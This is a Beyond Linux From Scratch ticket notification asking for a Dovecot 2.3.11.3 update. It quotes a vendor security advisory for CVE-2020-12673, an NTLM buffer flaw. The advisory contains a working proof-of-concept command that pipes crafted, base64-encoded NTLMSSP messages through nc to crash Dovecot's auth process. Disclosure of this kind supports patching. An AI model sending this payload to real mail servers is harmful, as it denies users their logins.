#13915: dovecot-2.3.11.3
-------------------------+------------------------
Reporter: renodr | Owner: blfs-book
Type: enhancement | Status: new
Priority: high | Milestone: 10.0
Component: BOOK | Version: SVN
Severity: normal | Resolution:
Keywords: |
-------------------------+------------------------
Comment (by renodr):
'''Email from oss-security regarding CVE-2020-12673'''
{{{
Open-Xchange Security Advisory 2020-08-12
Affected product: Dovecot IMAP server
Internal reference: DOP-1870 (Bug ID)
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Vulnerability Details:
Dovecot's NTLM implementation does not correctly check message buffer
size, which leads to reading past allocation which can lead to crash.
Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH NTLM'; echo -ne
'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
| \
base64 -w0 ;echo ;echo -ne
'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00orange\x00'|
\
base64 -w0;echo ; echo QUIT) | nc 127.0.0.1 110
Workaround:
Disable NTLM authentication.
Solution:
Upgrade to fixed version.
Best regards,
Aki Tuomi
Open-Xchange oy
}}}
--
Ticket URL: <http://wiki.linuxfromscratch.org/blfs/ticket/13915#comment:3>
BLFS Trac <http://wiki.linuxfromscratch.org/blfs>
Beyond Linux From Scratch
--
http://lists.linuxfromscratch.org/listinfo/blfs-book
FAQ: http://www.linuxfromscratch.org/blfs/faq.html
Unsubscribe: See the above information page
